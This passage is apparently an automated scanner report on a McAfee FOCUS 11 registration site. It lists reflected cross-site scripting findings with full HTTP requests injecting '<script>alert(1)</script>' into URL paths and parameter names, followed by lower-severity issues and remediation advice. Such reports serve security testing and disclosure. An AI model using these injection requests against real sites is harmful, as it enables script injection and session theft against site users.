<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquery/js/jquery-1.5.1.min.jsdec5e<script>alert(1)</script>b15d70b57c9 was not found on this server.
<p>
...[SNIP]...

1.15. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-ui-1.8.6.custom.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7552<script>alert(1)</script>2dddfba8be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquerye7552<script>alert(1)</script>2dddfba8be5/js/jquery-ui-1.8.6.custom.min.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:23 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4651
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquerye7552<script>alert(1)</script>2dddfba8be5/js/jquery-ui-1.8.6.custom.min.js was not found on this server.
<p>
...[SNIP]...

1.16. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-ui-1.8.6.custom.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72495<script>alert(1)</script>686e0a0c6ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery/js72495<script>alert(1)</script>686e0a0c6ac/jquery-ui-1.8.6.custom.min.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:24 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4651
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquery/js72495<script>alert(1)</script>686e0a0c6ac/jquery-ui-1.8.6.custom.min.js was not found on this server.
<p>
...[SNIP]...

1.17. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-ui-1.8.6.custom.min.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b12d1<script>alert(1)</script>0a8e9178014 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery/js/jquery-ui-1.8.6.custom.min.jsb12d1<script>alert(1)</script>0a8e9178014 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:25 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4651
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquery/js/jquery-ui-1.8.6.custom.min.jsb12d1<script>alert(1)</script>0a8e9178014 was not found on this server.
<p>
...[SNIP]...

1.18. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e51a1<script>alert(1)</script>4aae9f6e11e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jse51a1<script>alert(1)</script>4aae9f6e11e/AC_RunActiveContent.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:21 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4637
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jse51a1<script>alert(1)</script>4aae9f6e11e/AC_RunActiveContent.js was not found on this server.
<p>
...[SNIP]...

1.19. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94e40<script>alert(1)</script>ac6b36ddbd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/AC_RunActiveContent.js94e40<script>alert(1)</script>ac6b36ddbd2 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:22 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4637
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /js/AC_RunActiveContent.js94e40<script>alert(1)</script>ac6b36ddbd2 was not found on this server.
<p>
...[SNIP]...

1.20. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e49c<script>alert(1)</script>a5194870d64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/AC_RunActiveContent.js?7e49c<script>alert(1)</script>a5194870d64=1 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:20 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4640
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /js/AC_RunActiveContent.js?7e49c<script>alert(1)</script>a5194870d64=1 was not found on this server.
<p>
...[SNIP]...

1.21. https://secure.mcafeefocus.com/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70134<script>alert(1)</script>679c78c3854 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register70134<script>alert(1)</script>679c78c3854 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: http://mcafeefocus.com/focus2011/Registration/RegistrationInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4620
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /register70134<script>alert(1)</script>679c78c3854 was not found on this server.
<p>
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /attendee_login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /attendee_login.php HTTP/1.1
Host: secure.mcafeefocus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:51:01 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8410


<title>McAfee FOCUS 11 - My Event Login</title>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equ
...[SNIP]...
<div id="register">


<form name="reg_form" method="post" action="/attendee_login.php#searched">
<input type="hidden" name="action" value="">
...[SNIP]...
</div>
<input type="password" id="login_form_password" name="password" style="width:180px; float:right;"><label style="width:auto; margin:0px; line-height:32px; float:right">
...[SNIP]...

3. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


3.1. https://secure.mcafeefocus.com/attendee_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /attendee_login.php

Issue detail

The following email address was disclosed in the response:

Request

GET /attendee_login.php HTTP/1.1
Host: secure.mcafeefocus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:51:01 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8410


<title>McAfee FOCUS 11 - My Event Login</title>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equ
...[SNIP]...
<a href="mailto:registration@mcafeefocus.com">
...[SNIP]...
<a href="mailto:registration@mcafeefocus.com" style="color:#333">registration@mcafeefocus.com</a>
...[SNIP]...

3.2. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/AC_RunActiveContent.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4596
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:support@g2planet.com">support@g2planet.com</a>
...[SNIP]...

3.3. https://secure.mcafeefocus.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /register

Issue detail

The following email address was disclosed in the response:

Request

GET /register HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: http://mcafeefocus.com/focus2011/Registration/RegistrationInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:10 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 15037

<title>McAfee FOCUS 11 - Registration: Step 1</title>

<form name="reg_form" method="post" action="register">
<input type="hidden" name="action" value="">
<input type="hidden" name="next_page" value="
...[SNIP]...
<a href="mailto:registration@mcafeefocus.com" style="color:#333">registration@mcafeefocus.com</a>
...[SNIP]...

4. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


4.1. https://secure.mcafeefocus.com/attendee_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /attendee_login.php

Request

GET /attendee_login.php HTTP/1.1
Host: secure.mcafeefocus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:51:01 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8410


<title>McAfee FOCUS 11 - My Event Login</title>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equ
...[SNIP]...

4.2. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /js/AC_RunActiveContent.js

Request

GET /js/AC_RunActiveContent.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4596
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

5. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.mcafeefocus.com
Path:   /imagesMcF11/header_moneyBackGuarantee.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /imagesMcF11/header_moneyBackGuarantee.jpg HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:16 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Tue, 23 Aug 2011 21:09:00 GMT
ETag: "2075e15-10b-4ab329ac29300"
Accept-Ranges: bytes
Content-Length: 267
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

.PNG
.
...IHDR..............Cv.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1
.@.D.D. ....X[..!..........?`..)..Sm7<.v....f...n.?..8.Wf5!U.[.W.R.}.....wD.:T.*B.......*.z.*.yG../. U.c....
z..U.TA
...[SNIP]...

Report generated by XSS.CX at Wed Aug 24 10:10:00 GMT-06:00 2011.